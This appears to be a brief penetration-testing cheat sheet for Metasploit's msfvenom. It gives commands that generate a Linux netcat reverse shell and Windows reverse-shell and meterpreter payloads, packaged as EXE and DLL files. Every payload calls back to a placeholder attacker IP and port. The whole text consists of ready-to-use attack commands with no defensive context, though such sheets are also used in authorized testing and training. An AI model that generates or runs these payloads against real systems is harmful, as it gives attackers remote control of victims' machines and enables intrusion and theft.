https://github.com/rapid7/metasploit-framework/blob/master/msfvenom
MSFVENOM Base
Payloads naming convention : [OS]/[arch]/[payload]
msfvenom --list payloadsList payloads.
MSFVENOM Linux Reverse Shell
msfvenom -p cmd/unix/reverse_netcat LHOST=[ATTACKER_OP] LPORT=[ATTACKER_PORT]Generate a Linux reverse shell.
MSFVENOM Windows Reverse Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exeGenerate a reverse shell exe.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f exe -o shell.exeGenerate a meterpreter reverse shell exe.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ATTACKER_IP] LPORT=[ATTACKER_PORT] -f dll -o shell.dllGenerate a meterpreter reverse shell DLL.